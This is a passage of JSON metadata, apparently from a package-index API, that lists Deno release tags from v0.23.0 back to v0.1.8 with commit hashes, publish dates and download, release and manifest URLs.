.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"pur